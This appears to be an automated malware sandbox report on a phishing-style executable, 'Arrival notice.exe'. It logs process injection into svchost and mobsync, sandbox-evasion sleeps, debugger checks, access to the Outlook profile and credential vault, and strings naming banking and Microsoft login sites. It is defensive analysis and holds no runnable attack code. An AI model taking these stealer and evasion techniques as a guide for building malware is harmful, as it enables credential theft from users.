            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: version.dll
            Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\mobsync.exe Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Arrival notice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\mobsync.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Arrival notice.exeStatic file information: File size 1401539 > 1048576
            Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000009.00000003.1689351235.0000000003031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1689337789.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1689193431.000000000301B000.00000004.00000020.00020000.00000000.sdmp, JGgOTaRBeKg.exe, 0000000B.00000003.1798946272.000000000124F000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: JGgOTaRBeKg.exe, 0000000B.00000000.1640439845.0000000000AEE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Arrival notice.exe, 00000002.00000003.1338414590.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, Arrival notice.exe, 00000002.00000003.1337835940.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, Arrival notice.exe, 00000002.00000003.1338176959.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1620535046.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1725087316.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1622258941.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000003.1725316747.0000000004683000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000003.1727564650.000000000483F000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Arrival notice.exe, 00000002.00000003.1338414590.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, Arrival notice.exe, 00000002.00000003.1337835940.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, Arrival notice.exe, 00000002.00000003.1338176959.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000009.00000002.1725087316.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1620535046.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1725087316.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1622258941.0000000003400000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, mobsync.exe, 0000000C.00000002.3750651781.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000003.1725316747.0000000004683000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000003.1727564650.000000000483F000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3750651781.0000000004B8E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: mobsync.pdb source: svchost.exe, 00000009.00000003.1689351235.0000000003031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1689337789.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1689193431.000000000301B000.00000004.00000020.00020000.00000000.sdmp, JGgOTaRBeKg.exe, 0000000B.00000003.1798946272.000000000124F000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.0000000006CFC000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3748827254.0000000002DF8000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000501C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2024715906.000000003F7BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: JGgOTaRBeKg.exe, 0000000B.00000002.3756739747.0000000006CFC000.00000004.80000000.00040000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3748827254.0000000002DF8000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000C.00000002.3751638320.000000000501C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2024715906.000000003F7BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Arrival notice.exe, Static PE information: real checksum: 0xa2135 should be: 0x1586d1
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 9_2_00401A2C push ss; ret 9_2_00401BE6
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 9_2_0041692B push ebp; iretd 9_2_0041692C
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 9_2_004171D8 push 3E387F36h; iretd 9_2_004171E0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 9_2_004031E6 pushad ; retf 9_2_004031E7
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 9_2_004051FA push esi; retf 9_2_004051FB
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 9_2_0040D18F push ss; iretd 9_2_0040D190
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 9_2_0041937E pushad ; ret 9_2_00419387
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 9_2_0040D3E8 push eax; ret 9_2_0040D3E9
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 9_2_00401B85 push ss; ret 9_2_00401BE6
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 9_2_00417B93 push ds; retn 037Dh 9_2_00417C4F
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 9_2_00411BAC push esi; ret 9_2_00411BAF
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 9_2_0042DC63 push ss; retf 2CDBh 9_2_0042DD27
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 9_2_00403490 push eax; ret 9_2_00403492
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 9_2_00404D32 push esp; iretd 9_2_00404D33
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 9_2_0041F773 push dword ptr [ebx+ecx*8+1Dh]; retf 9_2_0041F7E0
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 9_2_00418F7F push ebp; ret 9_2_00418F9A
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 9_2_036309AD push ecx; mov dword ptr [esp], ecx 9_2_036309B6
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe, Code function: 11_2_0917B1DC push dword ptr [ebx+ecx*8+1Dh]; retf 11_2_0917B249
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe, Code function: 11_2_091749E8 push ebp; ret 11_2_09174A03
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe, Code function: 11_2_091658F6 push edi; retf 11_2_09165908
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe, Code function: 11_2_091658FC push edi; retf 11_2_09165908
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe, Code function: 11_2_0916C5FC push esi; iretd 11_2_0916C607
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe, Code function: 11_2_091735FC push ds; retn 037Dh 11_2_091736B8
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe, Code function: 11_2_09174DE7 pushad ; ret 11_2_09174DF0
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe, Code function: 11_2_09172C41 push 3E387F36h; iretd 11_2_09172C49
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe, Code function: 11_2_09160C63 push esi; retf 11_2_09160C64
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe, Code function: 11_2_0917A4BE pushad ; iretd 11_2_0917A4BF
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe, Code function: 11_2_0916079B push esp; iretd 11_2_0916079C
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe, Code function: 11_2_0916D615 push esi; ret 11_2_0916D618
            Source: C:\Windows\SysWOW64\mobsync.exe, Code function: 12_2_04A209AD push ecx; mov dword ptr [esp], ecx 12_2_04A209B6
            Source: C:\Windows\SysWOW64\mobsync.exe, Code function: 12_2_007FF058 push ds; retf 12_2_007FF063
            Source: C:\Windows\SysWOW64\mobsync.exe, Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Arrival notice.exe, API/Special instruction interceptor: Address: 44F928C
            Source: C:\Windows\SysWOW64\mobsync.exe, API/Special instruction interceptor: Address: 7FF8418CD324
            Source: C:\Windows\SysWOW64\mobsync.exe, API/Special instruction interceptor: Address: 7FF8418CD944
            Source: C:\Windows\SysWOW64\mobsync.exe, API/Special instruction interceptor: Address: 7FF8418CD504
            Source: C:\Windows\SysWOW64\mobsync.exe, API/Special instruction interceptor: Address: 7FF8418CD544
            Source: C:\Windows\SysWOW64\mobsync.exe, API/Special instruction interceptor: Address: 7FF8418CD1E4
            Source: C:\Windows\SysWOW64\mobsync.exe, API/Special instruction interceptor: Address: 7FF8418D0154
            Source: C:\Windows\SysWOW64\mobsync.exe, API/Special instruction interceptor: Address: 7FF8418CDA44
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 9_2_0365BBA0 rdtsc 9_2_0365BBA0
            Source: C:\Windows\SysWOW64\mobsync.exe, Window / User API: threadDelayed 9793
            Source: C:\Windows\SysWOW64\svchost.exe, API coverage: 0.8 %
            Source: C:\Windows\SysWOW64\mobsync.exe, API coverage: 2.8 %
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe, TID: 7900, Thread sleep time: -60000s >= -30000s
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe, TID: 7900, Thread sleep time: -43500s >= -30000s
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe, TID: 7900, Thread sleep count: 33 > 30
            Source: C:\Program Files (x86)\phrlTSRoQgrugveJHixwKWOBqvKZvUPvNmSJSsqiBxPIgGNzPz\JGgOTaRBeKg.exe, TID: 7900, Thread sleep time: -33000s >= -30000s
            Source: C:\Windows\SysWOW64\mobsync.exe, TID: 7888, Thread sleep count: 181 > 30
            Source: C:\Windows\SysWOW64\mobsync.exe, TID: 7888, Thread sleep time: -362000s >= -30000s
            Source: C:\Windows\SysWOW64\mobsync.exe, TID: 7888, Thread sleep count: 9793 > 30
            Source: C:\Windows\SysWOW64\mobsync.exe, TID: 7888, Thread sleep time: -19586000s >= -30000s
            Source: C:\Windows\SysWOW64\mobsync.exe, Last function: Thread delayed
            Source: C:\Windows\SysWOW64\mobsync.exe, Code function: 12_2_007FC690 FindFirstFileW, FindNextFileW, FindClose, 12_2_007FC690
            Source: 219X93M1i.12.dr, Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
            Source: 219X93M1i.12.dr, Binary or memory string: tasks.office.comVMware20,11696501413o
            Source: 219X93M1i.12.dr, Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
            Source: 219X93M1i.12.dr, Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
            Source: 219X93M1i.12.dr, Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
            Source: 219X93M1i.12.dr, Binary or memory string: dev.azure.comVMware20,11696501413j
            Source: 219X93M1i.12.dr, Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
            Source: 219X93M1i.12.dr, Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
            Source: 219X93M1i.12.dr, Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
            Source: 219X93M1i.12.dr, Binary or memory string: bankofamerica.comVMware20,11696501413x
            Source: 219X93M1i.12.dr, Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
            Source: 219X93M1i.12.dr, Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
            Source: 219X93M1i.12.dr, Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
            Source: 219X93M1i.12.dr, Binary or memory string: turbotax.intuit.comVMware20,11696501413t
            Source: mobsync.exe, 0000000C.00000002.3748827254.0000000002DF8000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000002.2026327573.000001A37F71D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 219X93M1i.12.dr, Binary or memory string: Interactive userers - HKVMware20,11696501413]
            Source: 219X93M1i.12.dr, Binary or memory string: outlook.office.comVMware20,11696501413s
            Source: 219X93M1i.12.dr, Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
            Source: 219X93M1i.12.dr, Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
            Source: 219X93M1i.12.dr, Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
            Source: 219X93M1i.12.dr, Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
            Source: 219X93M1i.12.dr, Binary or memory string: ms.portal.azure.comVMware20,11696501413
            Source: 219X93M1i.12.dr, Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
            Source: 219X93M1i.12.dr, Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
            Source: 219X93M1i.12.dr, Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
            Source: 219X93M1i.12.dr, Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
            Source: 219X93M1i.12.dr, Binary or memory string: global block list test formVMware20,11696501413
            Source: 219X93M1i.12.dr, Binary or memory string: outlook.office365.comVMware20,11696501413t
            Source: 219X93M1i.12.dr, Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
            Source: JGgOTaRBeKg.exe, 0000000B.00000002.3749270444.000000000124E000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZX
            Source: 219X93M1i.12.dr, Binary or memory string: interactiveuserers.comVMware20,11696501413
            Source: 219X93M1i.12.dr, Binary or memory string: discord.comVMware20,11696501413f
            Source: 219X93M1i.12.dr, Binary or memory string: AMC password management pageVMware20,11696501413
            Source: C:\Windows\SysWOW64\svchost.exe, Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe, Process queried: DebugPort
            Source: C:\Windows\SysWOW64\mobsync.exe, Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 9_2_00417B13 LdrLoadDll, 9_2_00417B13
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036E12ED mov eax, dword ptr fs:[00000030h]9_2_036E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036402E1 mov eax, dword ptr fs:[00000030h]9_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036402E1 mov eax, dword ptr fs:[00000030h]9_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036402E1 mov eax, dword ptr fs:[00000030h]9_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_037052E2 mov eax, dword ptr fs:[00000030h]9_2_037052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036EF2F8 mov eax, dword ptr fs:[00000030h]9_2_036EF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036292FF mov eax, dword ptr fs:[00000030h]9_2_036292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h]9_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h]9_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h]9_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h]9_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0363A2C3 mov eax, dword ptr fs:[00000030h]9_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365B2C0 mov eax, dword ptr fs:[00000030h]9_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365B2C0 mov eax, dword ptr fs:[00000030h]9_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365B2C0 mov eax, dword ptr fs:[00000030h]9_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365B2C0 mov eax, dword ptr fs:[00000030h]9_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365B2C0 mov eax, dword ptr fs:[00000030h]9_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365B2C0 mov eax, dword ptr fs:[00000030h]9_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365B2C0 mov eax, dword ptr fs:[00000030h]9_2_0365B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036392C5 mov eax, dword ptr fs:[00000030h]9_2_036392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036392C5 mov eax, dword ptr fs:[00000030h]9_2_036392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B2D3 mov eax, dword ptr fs:[00000030h]9_2_0362B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B2D3 mov eax, dword ptr fs:[00000030h]9_2_0362B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362B2D3 mov eax, dword ptr fs:[00000030h]9_2_0362B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365F2D0 mov eax, dword ptr fs:[00000030h]9_2_0365F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0365F2D0 mov eax, dword ptr fs:[00000030h]9_2_0365F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036402A0 mov eax, dword ptr fs:[00000030h]9_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036402A0 mov eax, dword ptr fs:[00000030h]9_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036452A0 mov eax, dword ptr fs:[00000030h]9_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036452A0 mov eax, dword ptr fs:[00000030h]9_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036452A0 mov eax, dword ptr fs:[00000030h]9_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036452A0 mov eax, dword ptr fs:[00000030h]9_2_036452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F92A6 mov eax, dword ptr fs:[00000030h]9_2_036F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F92A6 mov eax, dword ptr fs:[00000030h]9_2_036F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F92A6 mov eax, dword ptr fs:[00000030h]9_2_036F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036F92A6 mov eax, dword ptr fs:[00000030h]9_2_036F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h]9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C62A0 mov ecx, dword ptr fs:[00000030h]9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h]9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h]9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h]9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C62A0 mov eax, dword ptr fs:[00000030h]9_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C72A0 mov eax, dword ptr fs:[00000030h]9_2_036C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036C72A0 mov eax, dword ptr fs:[00000030h]9_2_036C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B92BC mov eax, dword ptr fs:[00000030h]9_2_036B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B92BC mov eax, dword ptr fs:[00000030h]9_2_036B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B92BC mov ecx, dword ptr fs:[00000030h]9_2_036B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B92BC mov ecx, dword ptr fs:[00000030h]9_2_036B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E284 mov eax, dword ptr fs:[00000030h]9_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366E284 mov eax, dword ptr fs:[00000030h]9_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B0283 mov eax, dword ptr fs:[00000030h]9_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B0283 mov eax, dword ptr fs:[00000030h]9_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_036B0283 mov eax, dword ptr fs:[00000030h]9_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03705283 mov eax, dword ptr fs:[00000030h]9_2_03705283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366329E mov eax, dword ptr fs:[00000030h]9_2_0366329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0366329E mov eax, dword ptr fs:[00000030h]9_2_0366329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0362F172 mov eax, dword ptr fs:[00000030h]9_2_0362F172
